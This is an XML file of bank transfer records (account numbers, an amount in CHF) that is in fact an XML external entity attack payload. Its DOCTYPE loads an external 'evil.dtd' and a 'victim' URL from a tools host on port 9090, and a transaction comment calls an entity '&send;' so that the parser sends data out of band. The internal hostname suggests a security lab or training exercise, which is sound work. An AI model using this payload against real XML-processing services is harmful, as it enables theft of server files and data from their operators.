<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE transactions [
        <!ELEMENT fromAccountNo (#PCDATA)>
        <!ELEMENT toAccountNo (#PCDATA)>
        <!ELEMENT amount (#PCDATA)>
        <!ELEMENT currency (#PCDATA)>
        <!ELEMENT comment (#PCDATA)>
        <!ELEMENT transaction (fromAccountNo, toAccountNo, amount, currency, comment)>
        <!ELEMENT transactions (transaction*)>
        <!ENTITY % victim SYSTEM 'http://sprg-tools.el.eee.intern:9090/victim?outOfBand=true'>
        <!ENTITY % dtd SYSTEM "http://sprg-tools.el.eee.intern:9090/xml/evil.dtd">
        %dtd;
        ]>
<transactions>
    <transaction>
        <fromAccountNo>1-123456-01</fromAccountNo>
        <toAccountNo>1-123456-02</toAccountNo>
        <amount>100</amount>
        <currency>CHF</currency>
        <comment>&send;</comment>
    </transaction>
</transactions>